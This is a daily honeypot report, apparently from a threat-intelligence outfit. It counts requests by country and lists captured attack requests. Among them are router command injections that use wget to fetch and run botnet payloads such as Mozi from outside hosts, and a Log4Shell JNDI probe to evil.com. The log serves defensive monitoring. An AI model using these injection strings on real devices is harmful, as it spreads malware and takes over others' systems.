Skip to main content
  1. Daily-Posts/

Report: 2025-09-02

·315 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-09-02
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 6 new requests that have never been observed before (these were added to the monitored request database.).

A total of 3952 requests were recorded during the day, originating from 6 different countries, with a peak of 924 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
GBGermany

botnet_dropper_behaviour
#

remote_addrrequest
120.28.169.1GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://120.28.169.1:57206/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
98.124.37.179GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
103.130.82.18GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
45.153.34.242GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C/91.224.92.22:58485/observatory/arm7;chmod+777+arm7;./arm7+jaws HTTP/1.1
177.69.131.79GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
121.167.125.180GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2981GET /?x=${jndi:ldap://${hostName}.evil.com/a} HTTP/1.1
2991GET /solr/admin/cores?wt=json&command={command} HTTP/1.1
3011\x00\x0E8\xE9\xCE{I\xAFO>\x7F\x00\x00\x00\x00\x00
6831\x00\x0E8\x986K\xC9\x95;}\xA0\x00\x00\x00\x00\x00
8861GET /trade/ HTTP/1.1
8871GET /bot/ HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0924US
1574GB
2304JP
3286DE
4256IE
5240AU
6211BR
7199IN
8196FR
9193SG
10173SE
11148KR
12106CA
1346SO
1414BG
1513NL
1613SC
178CN
187IR
196ZA
204MN
214UA
223AT
233FI
243BE
253VN
262TR
272RU
282HK
292MX
301PK
311PH
321NG
331PE
341MC
351MD
361ID

Related

Report: 2025-09-01
·366 words
Repport Daily
Report: 2025-08-31
·304 words
Repport Daily
Report: 2025-08-30
·331 words
Repport Daily